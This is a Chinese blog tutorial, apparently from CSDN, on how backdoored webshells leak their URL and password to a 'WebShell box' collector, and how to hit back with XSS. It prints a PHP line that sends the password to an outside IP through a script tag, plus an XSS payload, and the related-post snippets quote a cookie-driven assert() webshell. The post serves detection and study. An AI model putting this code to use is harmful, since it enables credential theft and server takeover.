WebShell后门检测与WebShell箱子反杀

最新推荐文章于 2024-07-08 12:11:58 发布
最新推荐文章于 2024-07-08 12:11:58 发布
阅读量1k 收藏 1
点赞数 4
分类专栏: 渗透测试 文章标签: WebShell WebShell箱子 反杀 XSS 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/127544573
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子反杀。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、WebShell后门检测

我们可以很容易的检测一个WebShell大马中是否存在这种后门。通过浏览器自带的网络功能,我们可以查看我们对大马的访问是否存在异常的数据包。如果发现如下所示的异常数据包:
在这里插入图片描述
则说明我们所使用的WebShell大马很大概率上存在后门。

二、WebShell后门原理

WebShell后门使用了如同XSS共计类似的原理,针对一个正常的WebShell,如果我们在WebShell中加入如下代码:

$url1="http://".$_SERVER['HTTP_HOST'].$_SERVER[PHP_SELF];
echo "<script src='http://192.168.136.7/api.asp?url=$url1&pass=$pass' >";

修改完成后的WebShell如下所示。当然,如果是应用在实战,那么这些代码可能会大概率被加密等处理,使他们看上去更加隐蔽。
上述代码,其基本含义是获得用户访问的HOST地址以及文件本身,还有登录所使用的密码,然后在页面上用JavaScript脚本来访问特定的网址,上述信息作为访问的参数。
WebShell箱子WebShell箱子简介与原理可以收集这些信息并进行展示,最终结果如下所示:
在这里插入图片描述
从上图中可以看出,我们的WebShell箱子收集到了该WebShell自身的URL以及登录的密码。

三、WebShell箱子反杀

如果我们能够找到WebShell中的后门,那么我们自然也可以利用同样的方法来进行反杀。我们可以修改上述代码,然后将向WebShell中发送的信息替换成类似XSS攻击的脚本代码,一个简单的示例如下所示:

$pass1="<script>alert(1);</script>";
echo "<script src='http://192.168.136.7/api.asp?url=http://1.1.1.1/123.php&pass=$pass1'>";

当我们将该代码插入并访问该页面时,此时该页面就会向WebShell箱子发送我们的代码,并最终实现对WebShell箱子的攻击,如下所示:
在这里插入图片描述
在这里插入图片描述
从以上实验可以看出,我们成功的实现了WebShell后门检测与WebShell箱子反杀。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1378
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
Webshell后门查杀
12-20
在描述中提到的"处理相关问题",指的是对已知或潜在的Webshell后门进行检测、清除和防护。 在Linux环境中,Webshell的查杀通常涉及以下几个步骤: 1. **日志分析**:首先,要检查Web服务器(如Apache、Nginx)的...
一次对webshell后门的查看
dfdhxb995397的博客
01-18 464
本文作者i春秋作家——非主流 昨天晚上突发奇想的想去看看github上面tennc的webshell收集项目中的shell有没有漏洞,比如未授权啊啥的,结果找半天都没找到。。。但是机缘巧合下,居然给我找到了一个后门狗。 存在后门webshell地址 follow me 我们咋一看这不就是jspspy嘛 年轻人不要急我们先把整个项目download下来然后再好...
如何有效查看PHP源码以检测潜在后门
最新发布
2401_86114092的博客
07-08 419
这些后门通常被设计得非常隐蔽,可能隐藏在正常的代码中,或者通过混淆、加密等手段进行伪装。在查看PHP源码时,我们需要检查所有与数据库相关的代码段,特别是那些用于插入、更新和删除数据的操作。在阅读过程中,我们需要特别关注那些与文件操作、数据库连接、系统命令执行等相关的代码段,因为这些地方是后门最可能隐藏的地方。因此,在查看源码时,我们需要特别注意这些代码段,并检查它们是否包含或执行了不可信的外部文件或代码。因此,在查看源码时,我们需要特别注意这些代码段,并检查它们是否可能被用于执行恶意操作。
应急响应-主机后门webshell的排查思路(webshell,启动项,隐藏账户,映像劫持,rootkit后门
告白的博客
08-04 1539
思路3:pchunter查看进程,大多数木马文件在没有做屏蔽等措施,在厂商归属,指纹信息会显示异常,或者无任何厂商归属信息,可以借助为参考。针对主机后门windows,linux,在对方植入webshell后,需要立即响应,排查出后门位置,以及排查对外连接,端口使用情况等等。借助工具:pchunter 火绒剑 均可,不方便情况下cmd查看对外连接状态,进程状态,端口信息等。linux被rootkit上线:无法查看到对外连接,在受害机执行命令可以做到隐藏进程,文件等。映像劫持,隐藏账户,均可借助工具查看,
Web漏洞-XSS跨站之订单系统实操-WebShell箱子反杀
ran的博客
03-16 1115
到这里我们就可以联想到,我们可以随便从网上下载一些后门,经过自己的加工加入自己的后门代码之后再重新发布到各类社区或者论坛等平台,取一个牛逼点的名字,当别人利用你的后门来对其它网站进行入侵的时候,你就可以同步获取到他的入侵的网站的信息,就相当于别人在帮我们入侵。因为获取到的网站以及密码等信息会发送到箱子的后台,所以可以想到在密码或者URL等位置插入XSS代码,当管理员查看信封的时候,就可能会触发XSS代码,从而实现反杀。来到网站的后台可以看到刚刚提交的信息被成功上传到了网站的后台。
网站漏洞测试 关于webshell木马后门检测
网站安全资讯
11-07 851
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全测试之前,我们对客户的网站大体的了解了一下,整个平台网站,包括APP,安卓端,I...
php后门拿下当前目录
aici0819的博客
03-26 379
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
基于python开发的webshell检测工具
06-28
【作品名称】:基于python开发的webshell检测工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 使用说明 Usage: ...
窃密型WebShell检测方法
01-30
前段时间由于项目的需要也因为正在负责一个后门检测小工具的项目开发所以恶补了一下Webshell检测技术内容,一路天马行空写下此文和大家分享。小弟才疏学浅如有内容上的问题还请不吝指正。近年来网站被植入后门等隐蔽...
webshell首页权限检测.zip
07-07
常见的检测方法包括但不限于文件异常监控(对比正常文件与疑似被篡改的文件)、日志分析(查看可疑的HTTP请求和响应)、代码审计(检查是否有可疑的PHP、ASP、JSP等脚本)、使用专用的Webshell查杀工具等。...
.net web shell后门(源码)
05-03
这事自己制作的一个.net webshell 通过.net 提权进行服务器注入用的 做出来给大家用 。 若不明白 可以联系我 里面有aspx和源码 。 欢迎下载 ,
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
制作WEBSHELL高级后门附带工具
11-02
制作高级ASP木马后门教程 让你多多收shell 制作自己的WEBSHELL收信箱子
WEBSHELL箱子系统V1.0.rar
03-24
WEBSHELL箱子系统
php webshell后门,PHP WebShell代码后门的一次检查
weixin_42172204的博客
03-21 291
if ($fp) {$out = "GET /{$query} HTTP/1.0\r\n";$out .= "Host: {$host}\r\n";$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $...
webshell后门检测原理
weixin_40628059的博客
04-30 6885
一、什么是webshell shell (计算机壳层) 在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。Shell 编程跟 java、php 编程一样,只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。 Linux 的 ...
BUUCTF webshell后门
Bnessy
03-25 521
下载附件,是网站源代码,题目说有webshell,那直接拿D盾扫 查看扫出来的后门文件,找到flag
Webshell后门分析
Williamanddog的博客
02-06 721
通过文件上传漏洞上传webshell 访问webshell地址: 可以通过post传参来执行命令,a=system("whoami"); 为什么可以通过post传参来执行系统命令呢? 分析一句话webshell的代码: php?>是php语言的格式,eval将括号内的字符串解析为php代码。 $_POST[test]为获取post参数test的值 @是抑制符号,屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息,这样用户就看不到程序的 出错信息。
webshell后门
07-27
Webshell后门是指一段网页代码,通常是ASP、ASP.NET、PHP、JSP等语言编写的,用于在服务器端进行一些危险操作,获取敏感信息或控制服务器的控制权。攻击者通过Webshell后门可以执行各种操作,比如上传、下载、删除文件,执行系统命令等。\[2\] 一个常见的Webshell后门示例是PHP代码,如下所示: ```php <?php @$a = $_COOKIE\[1\]; $b =''; $c=''; @assert($b.$a); ?> ``` 这段代码通过读取名为1的Cookie值,并使用assert函数执行该值作为PHP代码。攻击者可以通过设置Cookie来执行任意的PHP代码,从而控制服务器。\[1\] 为了防止Webshell后门的滥用,建议在服务器上加强安全措施,如定期更新软件补丁、限制文件上传权限、使用安全的密码策略等。此外,对于已经感染Webshell后门的服务器,应及时清除后门文件,并进行系统安全审计,以确保服务器的安全性。\[2\] #### 引用[.reference_title] - *1* [WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)](https://blog.csdn.net/weixin_43263566/article/details/128748547)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [网络攻防|Web后门知识详解](https://blog.csdn.net/weixin_42282189/article/details/120981598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值